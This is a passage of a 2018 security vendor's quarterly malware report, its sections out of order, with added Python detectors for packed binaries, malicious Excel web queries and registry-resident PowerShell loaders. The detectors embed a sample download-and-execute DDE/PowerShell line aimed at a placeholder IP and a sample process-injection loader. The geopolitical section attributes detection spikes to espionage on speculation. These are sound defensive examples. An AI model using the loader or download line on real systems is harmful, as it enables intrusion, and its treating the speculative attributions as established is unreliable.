A computer virus is self-replicating code that “infects” other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a “severe” virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a “Remote Service Account”.
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a “Severe” malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is “packed” refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified “Ultimate Packer for Executables”, dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home of malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
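The point that MUPX is a modified UPX matters for detection. A stock UPX build leaves recognisable section names and a "UPX!" signature in the file, while a modified build commonly strips them, so a detector that keys on markers alone misses exactly the variant the report says dominated. The Python script below is an added example, not code from the report or from the UPX project. It checks both signals over a raw file image: the UPX markers, and a sliding-window Shannon entropy, because compressed or encrypted code is close to random (near 8 bits per byte) while ordinary machine code and strings are not. The three sample images are constructed byte strings, not real binaries, and the 7.2-bit threshold is a common rule of thumb rather than a value from the report.

```python
import math
import random

# Markers a stock UPX build leaves behind: its section names and the packer
# signature. A modified build (the report's MUPX) may remove every one of them.
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX2", b"UPX!")

HIGH_ENTROPY = 7.2   # bits/byte; rule-of-thumb threshold for compressed or encrypted data
WINDOW = 512         # bytes per entropy window


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def high_entropy_fraction(data, window=WINDOW, threshold=HIGH_ENTROPY):
    """Fraction of fixed-size windows whose entropy exceeds the threshold."""
    windows = [data[i:i + window] for i in range(0, len(data) - window + 1, window)]
    if not windows:
        return 0.0
    hot = sum(1 for w in windows if shannon_entropy(w) > threshold)
    return hot / len(windows)


def classify(image):
    """Return marker hits, the high-entropy window fraction and a verdict
    for one file image. Markers are decisive; entropy is the fallback."""
    markers = [m.decode() for m in UPX_MARKERS if m in image]
    frac = high_entropy_fraction(image)
    if markers:
        verdict = "packed: UPX markers present"
    elif frac >= 0.5:
        verdict = "likely packed: no markers, mostly high-entropy content"
    else:
        verdict = "not packed by this heuristic"
    return {"markers": markers, "high_entropy_fraction": round(frac, 2), "verdict": verdict}


# --- constructed sample images (not real binaries) ---------------------------
_rng = random.Random(2018)
# Seeded pseudo-random bytes stand in for a compressed code section.
_random_blob = bytes(_rng.getrandbits(8) for _ in range(8 * WINDOW))

# 1. Stock UPX layout: stub header, UPX section names, compressed payload, signature.
SAMPLE_STOCK_UPX = (b"MZ" + b"\x00" * 62 + b"UPX0" + b"\x00" * 36 + b"UPX1"
                    + _random_blob + b"UPX!")
# 2. "Modified" packer: same compressed payload, every UPX marker renamed or removed.
SAMPLE_MODIFIED = (b"MZ" + b"\x00" * 62 + b".text\x00\x00\x00" + b"\x00" * 36
                   + b".data\x00\x00\x00" + _random_blob)
# 3. Ordinary unpacked content: repetitive code-like bytes plus readable strings.
SAMPLE_PLAIN = (b"MZ" + b"\x00" * 62 + b".text\x00\x00\x00"
                + b"\x55\x8b\xec\x83\xec\x10\x90\x90" * 300
                + b"Usage: tool.exe [options]\x00" * 40)

if __name__ == "__main__":
    for name, img in (("stock UPX", SAMPLE_STOCK_UPX),
                      ("modified", SAMPLE_MODIFIED),
                      ("plain", SAMPLE_PLAIN)):
        print(f"{name:10s} -> {classify(img)}")
```

The modified sample is the case the report's MUPX figure describes: no marker survives, but the payload is still almost incompressible, so the entropy pass catches it. Treat the entropy verdict as a triage signal rather than a conviction, since installers, compressed resources and legitimately encrypted sections also score high; the next step in practice is to unpack in a sandbox and scan the recovered image.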
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to “kill” it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a “Medium” threat because the hacker’s intention is not to damage or destroy information but merely to have fun at the victim’s expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous – but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application” or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user’s homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and “system optimizers”.
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section, let’s examine the unique malware profiles that Comodo identified within specific “verticals” or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical’s top malware type.
Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let’s examine “Zbot”, which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo’s Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.
7.10 Finland, Russia, USA
Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa – precisely where the summit was scheduled to take place.
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals are increasingly focused on hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategies, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
As you can see on the diagram, Ammyy Admin was used to spread many types of malware.
The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of Ammyy Admin version 3. Flawed Ammyy gives attackers functions such as remote desktop control, a file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, and so on.
The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. What is especially worth noticing is that this trick, too, relies on legitimate software, this time Microsoft Excel.
Flawed Ammyy is delivered to victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are Excel web query files: a small text file that tells Microsoft Excel to make an Internet query, so an IQY contains a URL and a few related parameters. When the file is opened, Excel fetches the URL and loads whatever it returns directly into the workbook.
The malicious IQY contained a URL under the attackers' control, which started a chain of malicious downloads that ended with Flawed Ammyy being downloaded and run via Windows PowerShell.
Malware runs PowerShell
Thus in this case machines face extremely dangerous and potent malware that is created and delivered via legitimate software. This makes the attack much harder for antivirus software to detect, and it is a reason to treat Excel web queries, and the content they pull in, as an attack surface rather than a convenience.
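The IQY handling described above, as an added example that is not the report's own code: a small Python triage for an Excel web-query attachment. It parses the three-line header plus the key=value options, refuses queries that go to cleartext URLs, bare IP addresses or hosts outside an assumed allowlist, and checks whether the text a query returns is a DDE formula of the `=cmd|'...'!A0` form that Excel would hand to a shell (the form the 2018 IQY campaigns used to reach PowerShell). The sample .iqy, the TEST-NET address 198.51.100.23, the allowlist and the response body are all constructed for this example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed .iqy attachment in the shape described above (not the report's sample).
# The host is in the documentation range 198.51.100.0/24.
SAMPLE_IQY = (
    "WEB\r\n"
    "1\r\n"
    "http://198.51.100.23/update/1.dat\r\n"
    "\r\n"
    "Selection=AllTables\r\n"
    "Formatting=None\r\n"
    "PreFormattedTextToColumns=True\r\n"
)

# Constructed body such a URL could return: an Excel DDE formula that, after the usual
# prompts, runs cmd.exe and from there PowerShell instead of filling cells with data.
SAMPLE_RESPONSE = (
    "=cmd|' /c powershell -w hidden -nop -c \"iex((New-Object Net.WebClient)"
    ".DownloadString('http://198.51.100.23/s.ps1'))\"'!A0\r\n"
)

# Assumed allowlist of hosts the organization's spreadsheets are permitted to query.
ALLOWED_HOSTS = {"intranet.example.internal"}


def parse_iqy(text):
    """Split an .iqy file into its fixed header (query type, version, URL) and key=value options."""
    lines = [line.strip() for line in text.splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    params = {}
    for line in lines[3:]:
        if "=" in line:
            key, _, value = line.partition("=")
            params[key.strip()] = value.strip()
    return {"type": lines[0], "version": lines[1], "url": lines[2], "params": params}


def assess_iqy(iqy, allowed_hosts=ALLOWED_HOSTS):
    """Reasons to hold the query back from Excel; an empty list means nothing looked off."""
    url = urlsplit(iqy["url"])
    host = (url.hostname or "").lower()
    findings = []
    if url.scheme.lower() != "https":
        findings.append(f"cleartext or unusual scheme: {url.scheme or '(none)'}")
    try:
        ipaddress.ip_address(host)
        findings.append(f"URL points at a bare IP address: {host}")
    except ValueError:
        pass  # a hostname, not an IP literal
    if host not in allowed_hosts:
        findings.append(f"host not on the web-query allowlist: {host or '(none)'}")
    return findings


# What a formula-based loader looks like once Excel has pulled it in.
DDE_FORMULA = re.compile(r"^\s*=\s*(?:cmd|msexcel|powershell|rundll32|regsvr32)\s*\|", re.I | re.M)
DDE_FUNCTION = re.compile(r"=\s*DDE\s*\(", re.I)


def looks_like_dde(body):
    """True if the fetched text would start a program rather than just populate cells."""
    return bool(DDE_FORMULA.search(body) or DDE_FUNCTION.search(body))


if __name__ == "__main__":
    query = parse_iqy(SAMPLE_IQY)
    for reason in assess_iqy(query):
        print("IQY:", reason)
    print("response is a DDE launcher:", looks_like_dde(SAMPLE_RESPONSE))
```

A mail gateway can run `parse_iqy` and `assess_iqy` on the attachment itself; `looks_like_dde` is for the case where the gateway or a sandbox is allowed to fetch the query URL and inspect what comes back before Excel ever sees it.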
2.4 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became the 800-pound gorilla of the malware market in Q2. This trend will inevitably shift attack vectors toward covert theft and the manipulation of users: a real gift for cybercriminals and a nightmare for users.
Trojans buy attackers time. Because the malware acts covertly, cybercriminals have more than enough time to use stolen data to their advantage. In many cases the attack is only discovered too late, after money has been withdrawn from a bank account or confidential data has been published. The combination of trojans as payload and phishing emails as delivery vector observed during Q2 will produce a surge in such attacks and victims. And the use of legitimate tools like PowerShell to run the malware will amplify the number of victims even more, because such attacks are much harder for antivirus software to detect.
To fight these attacks, cybersecurity departments need to realign their security measures with the trends above. Combining the best malware-detection tools with methods of protecting data built on defense-in-depth principles is the most promising solution.
Flawed Ammyy detections by month, Q2 2018 (chart data): April 43,188; May 46,382; June 48,881.
3 Cryptominer Evolution: Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean their impact has greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and re-provisioning to fight more efficiently. Cryptominers are developing quickly and gaining new, dangerous abilities.
Earlier cryptominers could only use an infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers did not steal information or destroy data like other malware, they merely consumed CPU resources. Moreover, they typically did not employ strong obfuscation and could easily be discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than mere cryptocurrency mining requires. These samples show that cryptominers are transforming into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide and to fight antimalware tools: they can camouflage themselves, kill competing cryptominers and even crash the user's system when an attempt is made to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, which makes it easier to detect. Fileless malware is different: as its name suggests, it is malicious code injected into legitimate OS processes. It need not be installed on the victim machine as a file but runs only in memory, which makes it much harder for antivirus software to detect. (As the BadShell case below shows, "fileless" malware still needs somewhere to persist, typically a scheduled task and a registry value, and those are exactly the places a responder should look.)
Such malware is usually spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. Because many antivirus tools cannot detect it, users remain unaware that they are infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter Comodo Threat Research Labs analysts faced just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company turned to Comodo Threat Research Labs for assistance.
Comodo analysts found that the malware was a cryptominer that used only legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence and the registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works.
Decoding the PowerShell arguments reveals the malicious code stored in the registry; the PowerShell script injects that code into an existing running process.
BadShell at work
The malicious code in the registry
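An added example, not the report's own code, of the decoding a responder does when faced with the scheduled-task plus registry layout described above: it recovers the PowerShell script from an `-EncodedCommand` argument (base64 of the UTF-16LE script), finds the registry value the script reads, base64-decodes that value and checks whether it is a PE image, and lists the command-line and script indicators worth alerting on. The task action, the registry path and value name, the `[Win32]` P/Invoke type and the placeholder payload are all constructed for the example; BadShell's real script and registry location are not reproduced on this page.

```python
import base64
import re

# Constructed sample of a registry-resident PowerShell loader in the layout described above
# (scheduled task -> encoded PowerShell -> registry value -> injection). The registry path,
# value name and the [Win32] P/Invoke type are assumptions; the payload is a placeholder
# MZ header, not real code. Nothing here is taken from the BadShell screenshots.
LOADER_SCRIPT = (
    r"$blob = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext' -Name 'Blob').Blob"
    "\n$bytes = [Convert]::FromBase64String($blob)"
    "\n$target = Get-Process -Name svchost | Select-Object -First 1"
    "\n$h = [Win32]::OpenProcess(0x1F0FFF, $false, $target.Id)"
    "\n$addr = [Win32]::VirtualAllocEx($h, 0, $bytes.Length, 0x3000, 0x40)"
    "\n[Win32]::WriteProcessMemory($h, $addr, $bytes, $bytes.Length, 0) | Out-Null"
    "\n[Win32]::CreateRemoteThread($h, 0, 0, $addr, 0, 0, 0) | Out-Null"
)
FAKE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"  # placeholder bytes with a PE-looking header


def encode_command(script):
    """-EncodedCommand is base64 of the UTF-16LE script; used here only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


TASK_ACTION = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + encode_command(LOADER_SCRIPT)
REGISTRY = {  # (key path, value name) -> value data, standing in for a registry export
    (r"HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext", "Blob"):
        base64.b64encode(FAKE_PAYLOAD).decode("ascii"),
}

REG_READ = re.compile(
    r"""(?:Get-ItemPropertyValue|Get-ItemProperty|gpv|gp)\s+(?:-Path\s+)?['"]?(HK[A-Z]+:[^'"\s]+)['"]?\s+-Name\s+['"]?([^'"\s)]+)""",
    re.I,
)
INDICATORS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("profile skipped", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("execution policy bypassed", re.compile(r"-ex(?:ec|ecutionpolicy)?\s+bypass", re.I)),
    ("base64 payload decoded in memory", re.compile(r"FromBase64String", re.I)),
    ("remote memory write", re.compile(r"VirtualAllocEx|WriteProcessMemory", re.I)),
    ("remote thread creation", re.compile(r"CreateRemoteThread|NtCreateThreadEx", re.I)),
]


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (or any prefix powershell.exe accepts), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in "-/":
            continue
        name = tok[1:].lower()
        if name and (name in ("e", "ec", "enc") or "encodedcommand".startswith(name)):
            return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
    return None


def find_registry_reads(script):
    """(key path, value name) pairs the script pulls its payload from."""
    return REG_READ.findall(script)


def triage(cmdline, registry):
    """Peel the layers: command line -> script -> registry value -> payload, collecting indicators."""
    script = decode_encoded_command(cmdline) or ""
    reads = find_registry_reads(script)
    payload = b""
    for path, name in reads:
        value = registry.get((path, name))
        if value:
            try:
                payload += base64.b64decode(value)
            except ValueError:
                pass  # value was not base64; leave it to manual inspection
    text = cmdline + "\n" + script
    hits = [label for label, rx in INDICATORS if rx.search(text)]
    if reads:
        hits.append("payload stored in registry")
    return {
        "script": script,
        "registry_reads": reads,
        "payload_is_pe": payload[:2] == b"MZ",
        "indicators": hits,
    }


if __name__ == "__main__":
    result = triage(TASK_ACTION, REGISTRY)
    print(result["registry_reads"], result["payload_is_pe"], result["indicators"])
```

On a live host the `REGISTRY` dictionary would be replaced by reads of the exported hive, and the scheduled-task action string comes from `schtasks /query /xml` or the Task Scheduler event log; the decoding steps stay the same.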
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took over the situation and cleaned the infection from all affected computers, but of course the company's financial losses were irreversible.
Evading antivirus software and persisting on the system are the most important attributes of a cryptominer, because the longer it runs on the infected system, the more it earns the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into the attacker's slave.
3.2 WinstarNssmMiner, a system killer
Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency for cybercriminals. But it has a special feature: it roots itself into the system so deeply that it becomes hard to remove, and a naive attempt to kill it brings down the target system entirely.
The secret of WinstarNssmMiner's persistence lies in how it infects a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially notable is that both infected svchost.exe processes carry the "critical process" attribute, meaning that terminating either of them crashes the system and leaves the user with a blue screen. (This is the ProcessBreakOnTermination flag that a process can set on itself through RtlSetProcessIsCritical; a responder with SeDebugPrivilege can query and clear it with NtQueryInformationProcess / NtSetInformationProcess before terminating the process, rather than killing it blindly.)
WinstarNssmMiner spreading around the world
Cryptominers can kill not only the victim's system but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out among cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
